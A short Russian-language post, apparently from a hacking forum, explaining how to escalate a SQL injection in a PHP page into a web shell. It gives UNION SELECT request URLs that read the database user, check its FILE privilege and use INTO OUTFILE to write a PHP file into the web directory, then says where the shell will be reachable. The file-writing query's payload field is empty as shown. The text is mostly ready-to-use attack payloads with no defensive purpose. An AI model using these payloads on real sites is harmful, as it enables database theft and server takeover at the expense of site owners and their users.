Сначала посмотри File_priv. Для этого:
http://site.ltd/a.php?a=-1+union+select+1,user(),3--+f
Копируем юзера.
http://site.ltd/a.php?a=-1+union+select+1,file_priv,3+from+mysql.user+where +user='тут юзер'--+f
Если выведет N, то залить не получится. Если Y + mq=off, то:
http://site.ltd/a.php?a=-1+union+select+1,,3+into+outfile+'/path/to/www/dir/file.php'--+f
После этого шелл будет по адресу site.ltd/dir/file.php